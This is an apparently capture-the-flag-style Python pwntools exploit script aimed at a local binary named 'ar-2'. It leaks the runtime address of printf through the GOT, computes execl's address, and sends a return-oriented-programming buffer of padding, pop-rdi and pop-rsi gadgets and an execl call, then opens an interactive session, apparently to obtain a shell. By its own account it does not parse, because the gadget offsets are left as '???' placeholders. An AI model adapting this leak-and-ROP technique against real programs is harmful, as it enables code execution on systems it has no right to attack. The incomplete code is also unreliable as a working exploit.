#!/usr/bin/env python
"""Incomplete proof-of-concept script for the local ``./ar-2`` binary (pwntools).

As written the file does not parse: the ``????`` / ``???`` placeholders below
are not valid Python.  Every value it reads or sends is specific to one
particular build of the target and its runtime layout.
"""
from pwn import *

# Spawn the local target as a pwntools process tube.
p = process("./ar-2")
# Terminal layout pwntools uses for gdb.attach; only relevant if the
# commented-out attach line is re-enabled.
context.terminal = ["tmux", "splitw", "-h"]
# gdb.attach(p, "b *input_func + 74")

# Address of the printf GOT slot, taken from the ELF pwntools parsed for the tube.
printf_got = p.elf.got['printf']
print("print_got:" + hex(printf_got))

# First prompt: the target asks for a count N; the script answers 8.
print(p.recvuntil(b"(N, in decimal)?"))
p.sendline(b"8")
# Second prompt (its text includes a sample address).  The GOT slot address is
# sent as a hex string; sendline encodes the str.  NOTE(review): both recvuntil
# calls depend on byte-exact prompt text, so any change to the target's output
# makes them block.
print(p.recvuntil(b"0xffffde01)?"))
p.sendline(hex(printf_got))

# Unbounded recv(): returns whatever has arrived so far, which need not be the
# whole response.  The split/index below then assumes a second line exists.
data = p.recv()
print("data: " + repr(data))
# First 8 bytes of the second output line, decoded as a little-endian 64-bit
# value.  u64 requires exactly 8 bytes and raises on a shorter slice.
d = data.split(b'\n')[1][0:8]
printf_addr = u64(d)
info("printf_addr:" + hex(printf_addr))

# Build-specific placeholders; the script cannot run until each is replaced.
execl_addr = printf_addr - ????
pop_rdi_ret = ???
pop_rsi_r15_ret = ???
link_str = ???

# 0x88 filler bytes followed by a sequence of p64-packed 8-byte values; the
# variable names suggest these are code addresses and arguments for the target.
buf = b"A" * 0x88
buf += p64(pop_rdi_ret)
buf += p64(link_str)
buf += p64(pop_rsi_r15_ret)
buf += p64(0)
buf += p64(0)
buf += p64(execl_addr)
p.sendline(buf)
# Hand the tube over to the terminal for interactive use.
p.interactive()